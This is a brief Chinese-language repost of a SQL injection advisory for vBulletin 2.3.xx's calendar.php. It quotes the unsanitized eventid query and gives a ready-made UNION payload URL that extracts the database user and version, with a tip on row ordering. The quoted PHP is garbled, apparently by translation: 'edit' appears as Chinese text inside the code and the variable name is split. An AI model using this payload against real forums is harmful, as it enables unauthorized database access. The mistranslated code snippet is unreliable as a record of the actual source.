vBulletin Forum 2.3.xx SQL Injection_php基础
- WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB原创
- 2016-05-17 09:11:131348浏览
vBulletin 论坛 2.3.xx SQL 注入 calendar.php 存在sql注入问题。
-------- 截自calendar.php第585行 ----------
else if ($ action == "编辑")
{
$eventinfo = $DB_site->query_first("SELECT allowedmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
------------------------------------------------ -----
如果MySQL版本大于4.00,则可以使用UNION攻击。
----------------- ------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12 union ( SELECT allowedmilies,public,userid,'0000-0-0',user(),version() FROM calendar_ev
ents WHERE eventid = 13) order by eventdate
----------- ------------------------------
query_first函数只会返回查询结果的第一行,所以请确保它返回!
你想要的那个。
声明:
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn